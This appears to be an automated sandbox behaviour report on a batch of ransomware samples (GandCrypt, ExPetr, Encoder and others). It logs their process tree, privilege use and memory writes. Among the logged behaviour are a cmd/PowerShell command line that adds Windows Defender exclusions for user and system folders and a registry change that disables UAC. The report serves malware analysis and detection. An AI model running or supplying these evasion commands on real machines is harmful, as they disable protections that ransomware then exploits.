N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: 33 N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.MSIL.Encoder.gen-b3ce84f48b34e821f18bfc828eb8da378d2531f7cc2bb16db82e11bead446b11.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Agent.gen-e50180a261801969db2574932e8deeac87a1efba53e50dbc1fc24a653a6b74bd.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\svchost32.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Generic-3c0360acd0ce74cb44b8fb9bd2c8fcfac81a980ae108b2477d5fbdc17786cbc7.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\services32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3124 wrote to memory of 3708 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3124 wrote to memory of 3708 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2884 wrote to memory of 4892 N/A C:\Windows\system32\taskmgr.exe C:\Windows\system32\taskmgr.exe
PID 2884 wrote to memory of 4892 N/A C:\Windows\system32\taskmgr.exe C:\Windows\system32\taskmgr.exe
PID 3708 wrote to memory of 3436 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.MSIL.Blocker.gen-9c03d92ab53c3001c366424540352be8192e2b394fb086407fec1c5171092c2a.exe
PID 3708 wrote to memory of 3436 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.MSIL.Blocker.gen-9c03d92ab53c3001c366424540352be8192e2b394fb086407fec1c5171092c2a.exe
PID 3708 wrote to memory of 2016 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.MSIL.Blocker.gen-c11675751bb311049da57745dbae337eafd48db2ca17c4195de23ff9eb40c5b3.exe
PID 3708 wrote to memory of 2016 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.MSIL.Blocker.gen-c11675751bb311049da57745dbae337eafd48db2ca17c4195de23ff9eb40c5b3.exe
PID 3708 wrote to memory of 3188 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.MSIL.Encoder.gen-b3ce84f48b34e821f18bfc828eb8da378d2531f7cc2bb16db82e11bead446b11.exe
PID 3708 wrote to memory of 3188 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.MSIL.Encoder.gen-b3ce84f48b34e821f18bfc828eb8da378d2531f7cc2bb16db82e11bead446b11.exe
PID 3708 wrote to memory of 4372 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Agent.gen-e50180a261801969db2574932e8deeac87a1efba53e50dbc1fc24a653a6b74bd.exe
PID 3708 wrote to memory of 4372 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Agent.gen-e50180a261801969db2574932e8deeac87a1efba53e50dbc1fc24a653a6b74bd.exe
PID 3188 wrote to memory of 3256 N/A C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.MSIL.Encoder.gen-b3ce84f48b34e821f18bfc828eb8da378d2531f7cc2bb16db82e11bead446b11.exe C:\Windows\SYSTEM32\cmd.exe
PID 3188 wrote to memory of 3256 N/A C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.MSIL.Encoder.gen-b3ce84f48b34e821f18bfc828eb8da378d2531f7cc2bb16db82e11bead446b11.exe C:\Windows\SYSTEM32\cmd.exe
PID 3436 wrote to memory of 4036 N/A C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.MSIL.Blocker.gen-9c03d92ab53c3001c366424540352be8192e2b394fb086407fec1c5171092c2a.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
PID 3436 wrote to memory of 4036 N/A C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.MSIL.Blocker.gen-9c03d92ab53c3001c366424540352be8192e2b394fb086407fec1c5171092c2a.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
PID 3708 wrote to memory of 4724 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Cryptoff.vho-fbf8b45d1697677f1f3e080552bfc66e9db36d03f28b22cf7156f0cb156e71ff.exe
PID 3708 wrote to memory of 4724 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Cryptoff.vho-fbf8b45d1697677f1f3e080552bfc66e9db36d03f28b22cf7156f0cb156e71ff.exe
PID 3256 wrote to memory of 2680 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3256 wrote to memory of 2680 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3708 wrote to memory of 4744 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Cryptor.gen-5b7bed7349f6b1499b7eac111d7264101b13eeb9684830a4a93bab5f9d79d77e.exe
PID 3708 wrote to memory of 4744 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Cryptor.gen-5b7bed7349f6b1499b7eac111d7264101b13eeb9684830a4a93bab5f9d79d77e.exe
PID 3708 wrote to memory of 4744 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Cryptor.gen-5b7bed7349f6b1499b7eac111d7264101b13eeb9684830a4a93bab5f9d79d77e.exe
PID 4744 wrote to memory of 6916 N/A C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Cryptor.gen-5b7bed7349f6b1499b7eac111d7264101b13eeb9684830a4a93bab5f9d79d77e.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4744 wrote to memory of 6916 N/A C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Cryptor.gen-5b7bed7349f6b1499b7eac111d7264101b13eeb9684830a4a93bab5f9d79d77e.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4744 wrote to memory of 6916 N/A C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Cryptor.gen-5b7bed7349f6b1499b7eac111d7264101b13eeb9684830a4a93bab5f9d79d77e.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4372 wrote to memory of 7124 N/A C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Agent.gen-e50180a261801969db2574932e8deeac87a1efba53e50dbc1fc24a653a6b74bd.exe C:\Windows\system32\cmd.exe
PID 4372 wrote to memory of 7124 N/A C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Agent.gen-e50180a261801969db2574932e8deeac87a1efba53e50dbc1fc24a653a6b74bd.exe C:\Windows\system32\cmd.exe
PID 3256 wrote to memory of 3620 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3256 wrote to memory of 3620 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 7124 wrote to memory of 224 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 7124 wrote to memory of 224 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3256 wrote to memory of 5180 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3256 wrote to memory of 5180 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3256 wrote to memory of 5344 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3256 wrote to memory of 5344 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 6916 wrote to memory of 5472 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 6916 wrote to memory of 5472 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 6916 wrote to memory of 5472 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 6916 wrote to memory of 5520 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\rundll32.exe
PID 6916 wrote to memory of 5520 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\rundll32.exe
PID 6916 wrote to memory of 5520 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\rundll32.exe
PID 3188 wrote to memory of 5616 N/A C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.MSIL.Encoder.gen-b3ce84f48b34e821f18bfc828eb8da378d2531f7cc2bb16db82e11bead446b11.exe C:\Windows\System32\cmd.exe
PID 3188 wrote to memory of 5616 N/A C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.MSIL.Encoder.gen-b3ce84f48b34e821f18bfc828eb8da378d2531f7cc2bb16db82e11bead446b11.exe C:\Windows\System32\cmd.exe
PID 5616 wrote to memory of 5672 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\Temp\svchost32.exe
PID 5616 wrote to memory of 5672 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\Temp\svchost32.exe
PID 3708 wrote to memory of 5656 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Encoder.gen-35a3be045e57f3a0abdbae99984760eef0c3713189deabae330f501178f48e31.exe
PID 3708 wrote to memory of 5656 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Encoder.gen-35a3be045e57f3a0abdbae99984760eef0c3713189deabae330f501178f48e31.exe
PID 3708 wrote to memory of 5656 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Encoder.gen-35a3be045e57f3a0abdbae99984760eef0c3713189deabae330f501178f48e31.exe
PID 5672 wrote to memory of 5764 N/A C:\Users\Admin\AppData\Local\Temp\svchost32.exe C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
PID 5672 wrote to memory of 5764 N/A C:\Users\Admin\AppData\Local\Temp\svchost32.exe C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
PID 3708 wrote to memory of 5772 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\Desktop\00484\Trojan-Ransom.Win32.GandCrypt.jgt-be84fd2db01517037caa965618e57173f8e5560c3a83843df27e5bc7d667e689.exe
PID 3708 wrote to memory of 5772 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\Desktop\00484\Trojan-Ransom.Win32.GandCrypt.jgt-be84fd2db01517037caa965618e57173f8e5560c3a83843df27e5bc7d667e689.exe
PID 3708 wrote to memory of 5772 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\Desktop\00484\Trojan-Ransom.Win32.GandCrypt.jgt-be84fd2db01517037caa965618e57173f8e5560c3a83843df27e5bc7d667e689.exe
PID 5656 wrote to memory of 5844 N/A C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Encoder.gen-35a3be045e57f3a0abdbae99984760eef0c3713189deabae330f501178f48e31.exe C:\Windows\SysWOW64\cmd.exe
PID 5656 wrote to memory of 5844 N/A C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Encoder.gen-35a3be045e57f3a0abdbae99984760eef0c3713189deabae330f501178f48e31.exe C:\Windows\SysWOW64\cmd.exe
PID 5656 wrote to memory of 5844 N/A C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Encoder.gen-35a3be045e57f3a0abdbae99984760eef0c3713189deabae330f501178f48e31.exe C:\Windows\SysWOW64\cmd.exe
PID 5764 wrote to memory of 5868 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 5764 wrote to memory of 5868 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3708 wrote to memory of 5864 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-ef8045de414c6a1ebbdc6ba03f14e832be975d14e6295d1c0c884768e8f53cdb.exe
PID 3708 wrote to memory of 5864 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-ef8045de414c6a1ebbdc6ba03f14e832be975d14e6295d1c0c884768e8f53cdb.exe
PID 3708 wrote to memory of 5864 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-ef8045de414c6a1ebbdc6ba03f14e832be975d14e6295d1c0c884768e8f53cdb.exe
PID 5656 wrote to memory of 5880 N/A C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Encoder.gen-35a3be045e57f3a0abdbae99984760eef0c3713189deabae330f501178f48e31.exe C:\Windows\SysWOW64\cmd.exe
PID 5656 wrote to memory of 5880 N/A C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Encoder.gen-35a3be045e57f3a0abdbae99984760eef0c3713189deabae330f501178f48e31.exe C:\Windows\SysWOW64\cmd.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Encoder.gen-35a3be045e57f3a0abdbae99984760eef0c3713189deabae330f501178f48e31.exe N/A

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\RNSM00484.7z

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00484.7z"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /1

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.MSIL.Blocker.gen-9c03d92ab53c3001c366424540352be8192e2b394fb086407fec1c5171092c2a.exe

HEUR-Trojan-Ransom.MSIL.Blocker.gen-9c03d92ab53c3001c366424540352be8192e2b394fb086407fec1c5171092c2a.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.MSIL.Blocker.gen-c11675751bb311049da57745dbae337eafd48db2ca17c4195de23ff9eb40c5b3.exe

HEUR-Trojan-Ransom.MSIL.Blocker.gen-c11675751bb311049da57745dbae337eafd48db2ca17c4195de23ff9eb40c5b3.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.MSIL.Encoder.gen-b3ce84f48b34e821f18bfc828eb8da378d2531f7cc2bb16db82e11bead446b11.exe

HEUR-Trojan-Ransom.MSIL.Encoder.gen-b3ce84f48b34e821f18bfc828eb8da378d2531f7cc2bb16db82e11bead446b11.exe

C:\Windows\SYSTEM32\cmd.exe

"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Agent.gen-e50180a261801969db2574932e8deeac87a1efba53e50dbc1fc24a653a6b74bd.exe

HEUR-Trojan-Ransom.Win32.Agent.gen-e50180a261801969db2574932e8deeac87a1efba53e50dbc1fc24a653a6b74bd.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe

dw20.exe -x -s 804

